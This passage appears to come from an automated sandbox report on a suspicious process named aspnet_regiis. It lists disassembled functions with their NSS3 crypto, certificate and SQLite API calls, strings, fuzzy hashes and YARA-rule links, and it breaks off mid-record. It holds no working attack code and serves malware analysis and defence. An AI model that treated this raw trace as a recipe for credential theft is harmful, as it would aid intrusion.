Instruction Fuzzy Hash: CA618FB0E412459BEB04DF64D885FAABBB5AF08348F144138EC59ABB42E731E945CB91

Function 6C40ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE10
EnterCriticalSection.KERNEL32(?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C3ED079,00000000,00000001), ref: 6C40AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE7F
TlsGetValue.KERNEL32(?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AEF1
free.MOZGLUE(6C3ECDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3ECDBB,?), ref: 6C40AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AF30

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 86e86d6526da447191bacff476d5006694aea0b126084ccd3d7b434c6fe5a298
Instruction ID: e6bc5a99a23abd5c1a37243497c6baf9c8c1ec734511b91bfae97f529894a64d
Opcode Fuzzy Hash: 86e86d6526da447191bacff476d5006694aea0b126084ccd3d7b434c6fe5a298
Instruction Fuzzy Hash: B4517CB1A81602AFDB01DF25D885F5AB7B4BF05319F144264E9189BF11E732F8A4CBD1

Function 6C3E4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C3EAB7F,?,00000000,?), ref: 6C3E4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C3EAB7F,?,00000000,?), ref: 6C3E4CC8
TlsGetValue.KERNEL32(?,6C3EAB7F,?,00000000,?), ref: 6C3E4CE0
EnterCriticalSection.KERNEL32(?,?,6C3EAB7F,?,00000000,?), ref: 6C3E4CF4
PL_HashTableLookup.NSS3(?,?,?,6C3EAB7F,?,00000000,?), ref: 6C3E4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C3E4D10

Part of subcall function 6C46DD70: TlsGetValue.KERNEL32 ref: 6C46DD8C
Part of subcall function 6C46DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C46DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C3E4D26

Part of subcall function 6C489DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C4D0A27), ref: 6C489DC6
Part of subcall function 6C489DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C4D0A27), ref: 6C489DD1
Part of subcall function 6C489DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C489DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C3E4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C3E4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C3E4E02

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: a181b0da010870443b7f4ad1b5ad9397929bdf5794af3c2847f0db6262e9b764
Instruction ID: bd6431969da780cab02728561488a9b1f876a86411864a36ad136b54d2275ce7
Opcode Fuzzy Hash: a181b0da010870443b7f4ad1b5ad9397929bdf5794af3c2847f0db6262e9b764
Instruction Fuzzy Hash: 2A41E7B69002159BEB00AF65EC44A5B77A8EF0D25CF064171EC08D7B12EB32E914CFE2

Function 6C3C2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C3C2CDA,?,00000000), ref: 6C3C2E1E

Part of subcall function 6C41FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C3C9003,?), ref: 6C41FD91
Part of subcall function 6C41FD80: PORT_Alloc_Util.NSS3(A4686C42,?), ref: 6C41FDA2
Part of subcall function 6C41FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C42,?,?), ref: 6C41FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C3C2E33

Part of subcall function 6C41FD80: free.MOZGLUE(00000000,?,?), ref: 6C41FDD1

TlsGetValue.KERNEL32 ref: 6C3C2E4E
EnterCriticalSection.KERNEL32(?), ref: 6C3C2E5E
PL_HashTableLookup.NSS3(?), ref: 6C3C2E71
PL_HashTableRemove.NSS3(?), ref: 6C3C2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C3C2E96
PR_Unlock.NSS3 ref: 6C3C2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C3C2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C3C2EC5

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 4e8fad6c01203e23424316900fb0121e6b1d01569b0e354e77de18c311e4e78a
Instruction ID: 2b058f49cfe1eb30b90043219baf7597fb2d100dd72b77603c66a2712533104c
Opcode Fuzzy Hash: 4e8fad6c01203e23424316900fb0121e6b1d01569b0e354e77de18c311e4e78a
Instruction Fuzzy Hash: EC213A76A04100A7EF006B35DD09E9F7AB8EB5235CF150034ED18A6B11FB33D958CAE6

Function 6C34CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C34B999), ref: 6C34CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C34B999), ref: 6C34D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C34B999), ref: 6C34D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C34B999), ref: 6C49972B

Strings

database corruption, xrefs: 6C34CFE7, 6C34D013, 6C34D028, 6C34D039, 6C34D03E, 6C499786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C34CFDD, 6C34D00E, 6C34D022, 6C34D033, 6C499780
%s at line %d of [%.10s], xrefs: 6C34CFEC, 6C34D018, 6C34D029, 6C34D03F, 6C49978B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 2502ad74115a07e9ad431b6ee0c0016a3e4364f25df52d49b7853204fe65622e
Instruction ID: 200193aa04dcfb5108ee1296dd841bbf603e5bc349a3b411460fb92af6071863
Opcode Fuzzy Hash: 2502ad74115a07e9ad431b6ee0c0016a3e4364f25df52d49b7853204fe65622e
Instruction Fuzzy Hash: 10610671A042608BD310CF29C840FA6BBF5AF95318F2881ADE5499BB41D37BD947CBA1

Function 6C424DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C42536F,00000022,?,?,00000000,?), ref: 6C424E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C424F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C424F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C424FAE
free.MOZGLUE(?), ref: 6C424FC8

Strings

%s=%c%s%c, xrefs: 6C424FA9
oSBl", xrefs: 6C424DFB, 6C424EF4, 6C424EC5
%s=%s, xrefs: 6C424F89

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSBl"
API String ID: 2709355791-1395165434
Opcode ID: 8ae7361090cd30b692910afbd149d75f453f3419a2d3ac54c22f8fae6c9204f9
Instruction ID: 20b144b0b0de8cc6cffa7faa84613e840327df59d8aceed5f0aff85a1ba360c2
Opcode Fuzzy Hash: 8ae7361090cd30b692910afbd149d75f453f3419a2d3ac54c22f8fae6c9204f9
Instruction Fuzzy Hash: AB515B31A051458BFB11CA698852FFF7BF1EF8638AF199125E894E7B40D33D88068791

Function 6C44EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C46A4A1,?,00000000,?,00000001), ref: 6C44EF6D

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

htonl.WSOCK32(00000000,?,6C46A4A1,?,00000000,?,00000001), ref: 6C44EFE4
htonl.WSOCK32(?,00000000,?,6C46A4A1,?,00000000,?,00000001), ref: 6C44EFF1
memcpy.VCRUNTIME140(?,?,6C46A4A1,?,00000000,?,6C46A4A1,?,00000000,?,00000001), ref: 6C44F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C46A4A1,?,00000000,?,00000001), ref: 6C44F027

Strings

dtls13, xrefs: 6C44EF33

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 7d5139fda02852c43cf8d3e70d1859e340023b3b856daf891018ded71fada00e
Instruction ID: 4241ba20c30807666aab996e6f352103a9ae7a583842b3a1a5f57078b181019c
Opcode Fuzzy Hash: 7d5139fda02852c43cf8d3e70d1859e340023b3b856daf891018ded71fada00e
Instruction Fuzzy Hash: 2131BF71A01211ABE710DF28DC84F8AB7E4EF49348F268029E8189BB51E731F915CBE1

Function 6C3CAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C3CAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C4E9500,6C3C3F91), ref: 6C3CAFD2

Part of subcall function 6C41B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4F18D0,?), ref: 6C41B095

DER_GetInteger_Util.NSS3(?), ref: 6C3CB007

Part of subcall function 6C416A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C3C1666,?,6C3CB00C,?), ref: 6C416AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C3CB02F
PR_CallOnce.NSS3(6C522AA4,6C4212D0), ref: 6C3CB046
PL_FreeArenaPool.NSS3 ref: 6C3CB058
PL_FinishArenaPool.NSS3 ref: 6C3CB060

Strings

security, xrefs: 6C3CAFB8

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 562999e9052caba98f16bf07bedf172fdd4e4df0baccfd96648adf233af521d5
Instruction ID: e162e59af3e74d047944d46ec176bed473a70cfd1c2360794ad3c18468217869
Opcode Fuzzy Hash: 562999e9052caba98f16bf07bedf172fdd4e4df0baccfd96648adf233af521d5
Instruction Fuzzy Hash: 5031E0715043509BDB108F249C45FEA77A4AF8636CF10061DE8A4ABAD1E3369909CBA7

Function 6C3FACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C3FACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3FAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3FAD23

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3FAD39

Strings

nMl, xrefs: 6C3FAD51, 6C3FAD7B
(CK_INVALID_HANDLE), xrefs: 6C3FAD1C
C_MessageDecryptFinal, xrefs: 6C3FACE1
hSession = 0x%x, xrefs: 6C3FACFE, 6C3FAD0E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nMl
API String ID: 332880674-789099255
Opcode ID: 891709323fff1eaeb56569af17d57d7f9181c4200a5da1c84474530f2cd68fd1
Instruction ID: aa1b67babc9c5c32f7b040b0d7b2c3118d48a6f551d54067d926bacea5888b26
Opcode Fuzzy Hash: 891709323fff1eaeb56569af17d57d7f9181c4200a5da1c84474530f2cd68fd1
Instruction Fuzzy Hash: DB213A746011449FDB00EB24DDA8F6A77F9AB4231EF464829F81997A11DB389809CFB7

Function 6C40CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C40CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C40CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C40D079

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: f76206d1ea09bb73d5e5422d19f4e59f0e31a5ea65eff33fc47f94bdcc985a6e
Instruction ID: 771731f96999305dc372f39e821bb98e111dc5097b41e7728bb34cef67066d8f
Opcode Fuzzy Hash: f76206d1ea09bb73d5e5422d19f4e59f0e31a5ea65eff33fc47f94bdcc985a6e
Instruction Fuzzy Hash: CFC159B1A402199BDB20DF24CC84FDAB7B4AF48318F1441B8E94CA7741E775AA99CFD1

Function 6C3C2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(3B4C37C4), ref: 6C3C2C5D

Part of subcall function 6C420D30: calloc.MOZGLUE ref: 6C420D50
Part of subcall function 6C420D30: TlsGetValue.KERNEL32 ref: 6C420D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C3C2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C3C2CE0

Part of subcall function 6C3C2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C3C2CDA,?,00000000), ref: 6C3C2E1E
Part of subcall function 6C3C2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C3C2E33
Part of subcall function 6C3C2E00: TlsGetValue.KERNEL32 ref: 6C3C2E4E
Part of subcall function 6C3C2E00: EnterCriticalSection.KERNEL32(?), ref: 6C3C2E5E
Part of subcall function 6C3C2E00: PL_HashTableLookup.NSS3(?), ref: 6C3C2E71
Part of subcall function 6C3C2E00: PL_HashTableRemove.NSS3(?), ref: 6C3C2E84
Part of subcall function 6C3C2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C3C2E96
Part of subcall function 6C3C2E00: PR_Unlock.NSS3 ref: 6C3C2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3C2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C3C2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C3C2D3F
free.MOZGLUE(00000000), ref: 6C3C2D73
CERT_DestroyCertificate.NSS3(?), ref: 6C3C2DB8
free.MOZGLUE ref: 6C3C2DC8

Part of subcall function 6C3C3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3C3EC2
Part of subcall function 6C3C3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C3C3ED6
Part of subcall function 6C3C3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C3C3EEE
Part of subcall function 6C3C3E60: PR_CallOnce.NSS3(6C522AA4,6C4212D0), ref: 6C3C3F02
Part of subcall function 6C3C3E60: PL_FreeArenaPool.NSS3 ref: 6C3C3F14
Part of subcall function 6C3C3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C3C3F27

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: befa8abf9f8560c9fe70fb63a4bfeeff32ed3aadf5f446806de10ee7d90b8d9d
Instruction ID: eba81345bb1f7fb83e418798d6f61e272b6e3164aac2045e0d0809568c9a32d1
Opcode Fuzzy Hash: befa8abf9f8560c9fe70fb63a4bfeeff32ed3aadf5f446806de10ee7d90b8d9d
Instruction Fuzzy Hash: F251BC72B043119BDB019E299D89B5F77E5AF94348F150428ECA583610EB33EC148F93

Function 6C3C8980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C3C7310), ref: 6C3C89B8

Part of subcall function 6C421200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C3C88A4,00000000,00000000), ref: 6C421228
Part of subcall function 6C421200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C421238
Part of subcall function 6C421200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C3C88A4,00000000,00000000), ref: 6C42124B
Part of subcall function 6C421200: PR_CallOnce.NSS3(6C522AA4,6C4212D0,00000000,00000000,00000000,?,6C3C88A4,00000000,00000000), ref: 6C42125D
Part of subcall function 6C421200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C42126F
Part of subcall function 6C421200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C421280
Part of subcall function 6C421200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C42128E
Part of subcall function 6C421200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C42129A
Part of subcall function 6C421200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4212A1

PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C3C7310), ref: 6C3C89E6
PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C3C8A00
CERT_CopyRDN.NSS3(00000004,00000000,6C3C7310,?,?,00000004,?), ref: 6C3C8A1B
PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C3C8A74
PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,6C3C7310), ref: 6C3C8AAF
PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,6C3C7310), ref: 6C3C8AF3
PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,6C3C7310), ref: 6C3C8B1D

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
String ID:
API String ID: 3791662518-0
Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction ID: 8f498d28d99afad1348f5ff90dee459e8579c0bea2a20ac2e6b2d56aaaa8c238
